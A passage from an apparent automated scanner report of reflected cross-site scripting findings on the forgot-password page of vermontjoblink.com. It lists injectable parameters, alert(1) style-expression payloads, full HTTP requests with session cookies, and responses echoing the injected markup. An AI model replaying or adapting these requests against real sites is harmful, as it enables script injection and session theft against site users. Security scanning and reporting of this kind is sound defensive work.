PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="BLTEXTBOXEXTRADONOTUSE1_prev" value="aa244"style="x:expression(alert(1))"619b41b3cda6e8e06" />
...[SNIP]...

3.135. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [cftextboxextradonotuse parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the cftextboxextradonotuse request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9626d"style%3d"x%3aexpression(alert(1))"bc06bcef9e was submitted in the cftextboxextradonotuse parameter. This input was echoed as 9626d"style="x:expression(alert(1))"bc06bcef9e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 613

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&U_name=yes&choice=2&cftextboxextradonotuse=9626d"style%3d"x%3aexpression(alert(1))"bc06bcef9e&bltextboxextradonotuse1=&FORMNAME_prev=Form0&CHOICE_prev=2&ERRORFIELDS_prev=usvuserid&LIBRARY_ERRORMESSAGE_prev=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fl
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:43 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:43'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="cftextboxextradonotuse_error" value="9626d"style="x:expression(alert(1))"bc06bcef9e" class="cfTransparent" />
...[SNIP]...

3.136. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [cftextboxextradonotuse parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the cftextboxextradonotuse request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 862fa"style%3d"x%3aexpression(alert(1))"ccd6b612736c001e5 was submitted in the cftextboxextradonotuse parameter. This input was echoed as 862fa"style="x:expression(alert(1))"ccd6b612736c001e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=862fa"style%3d"x%3aexpression(alert(1))"ccd6b612736c001e5&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:03 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="CFTEXTBOXEXTRADONOTUSE_prev" value="862fa"style="x:expression(alert(1))"ccd6b612736c001e5" />
...[SNIP]...

3.137. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [choice parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the choice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2035"style%3d"x%3aexpression(alert(1))"4c07fa26276 was submitted in the choice parameter. This input was echoed as b2035"style="x:expression(alert(1))"4c07fa26276 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 613

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&U_name=yes&choice=2b2035"style%3d"x%3aexpression(alert(1))"4c07fa26276&cftextboxextradonotuse=&bltextboxextradonotuse1=&FORMNAME_prev=Form0&CHOICE_prev=2&ERRORFIELDS_prev=usvuserid&LIBRARY_ERRORMESSAGE_prev=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:39 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:39'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="old_choice" value="2b2035"style="x:expression(alert(1))"4c07fa26276" class="cfTransparent">
...[SNIP]...

3.138. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [errorfields parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the errorfields request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d074f"style%3d"x%3aexpression(alert(1))"ea31d84cdc0b4d853 was submitted in the errorfields parameter. This input was echoed as d074f"style="x:expression(alert(1))"ea31d84cdc0b4d853 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&usvuserid_adadefault_error=&securitysys=on&formname_error=Form0&choice_error=2&cftextboxextradonotuse=&errorfields=usvuseridd074f"style%3d"x%3aexpression(alert(1))"ea31d84cdc0b4d853&cftextboxextradonotuse_error=&formname=Form0&usvuserid_error=&choice=2&submit_error=Continue&bltextboxextradonotuse1_error=&u_name_error=yes&bltextboxextradonotuse1=&formid=10&old_choice=2&rand=1902&old_choice_error=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A38%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:22 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="ERRORFIELDS_prev" value="usvuseridd074f"style="x:expression(alert(1))"ea31d84cdc0b4d853" />
...[SNIP]...

3.139. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [formid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the formid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98f22"style%3d"x%3aexpression(alert(1))"386752025378121a2 was submitted in the formid parameter. This input was echoed as 98f22"style="x:expression(alert(1))"386752025378121a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&usvuserid_adadefault_error=&securitysys=on&formname_error=Form0&choice_error=2&cftextboxextradonotuse=&errorfields=usvuserid&cftextboxextradonotuse_error=&formname=Form0&usvuserid_error=&choice=2&submit_error=Continue&bltextboxextradonotuse1_error=&u_name_error=yes&bltextboxextradonotuse1=&formid=1098f22"style%3d"x%3aexpression(alert(1))"386752025378121a2&old_choice=2&rand=1902&old_choice_error=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A38%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:29 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="FORMID_prev" value="47,1098f22"style="x:expression(alert(1))"386752025378121a2" />
...[SNIP]...

3.140. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [formid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the formid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7db83"><a>0b5858b10bb was submitted in the formid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ada/mn_forgotpass.cfm?securitysys=on&formid=107db83"><a>0b5858b10bb&rand=662813&choice=1 HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:19:22 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<a href="/ada/mn_forgotpass.cfm?securitysys=on&amp;formid=107db83"><a>0b5858b10bb&amp;rand=805514&amp;choice=2">
...[SNIP]...

3.141. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [formname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the formname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 799ac"style%3d"x%3aexpression(alert(1))"4abc07c70f3b31178 was submitted in the formname parameter. This input was echoed as 799ac"style="x:expression(alert(1))"4abc07c70f3b31178 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

